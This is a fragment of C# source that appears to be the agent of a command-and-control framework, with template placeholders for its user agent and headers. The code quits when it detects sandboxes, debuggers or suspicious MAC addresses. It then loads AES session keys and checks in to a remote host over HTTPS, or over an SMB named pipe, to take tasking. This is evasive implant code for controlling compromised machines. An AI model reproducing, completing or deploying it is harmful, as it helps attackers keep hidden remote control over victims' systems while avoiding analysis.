public static void Execute(string json, string cookie, NamedPipeClientStream pipe) { if (containsSandboxArtifacts() || isBadMac() || isDebugged()) { return; } byte[] aeskey; byte[] aesiv; string agentid = ""; Thread servert = null; bool smbstarted = false; bool managed = injectionmanaged; List <string> smblisteners = new List <string>(); Dictionary <string, List <Core.Utility.TaskMsg> > commands = new Dictionary <string, List <Core.Utility.TaskMsg> >(); Random r = new Random(); Core.Utility.AgentIdMsg agentidmsg = Core.Utility.GetAgentId(json); agentid = agentidmsg.agentid; aeskey = Convert.FromBase64String(agentidmsg.sessionkey); aesiv = Convert.FromBase64String(agentidmsg.sessioniv); Core.Utility.CookiedWebClient wc = new Core.Utility.CookiedWebClient(); WebHeaderCollection webHeaderCollection = new WebHeaderCollection(); webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#"); #HEADERS #
public Worker(string json, string cookie, NamedPipeClientStream pipe) { Random r = new Random(); this.pipe = pipe; Core.Utility.AgentIdMsg agentidmsg = Core.Utility.GetAgentId(json); agentid = agentidmsg.agentid; aeskey = Convert.FromBase64String(agentidmsg.sessionkey); aesiv = Convert.FromBase64String(agentidmsg.sessioniv); this.wc = CreateWebClient(cookie, host); string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)]); if (this.pipe != null) { Core.Utility.SendCheckinSMB(agentid, aeskey, aesiv, this.pipe); } else { Core.Utility.SendCheckinHttp(agentid, aeskey, aesiv, rpaddress, param, wc); } }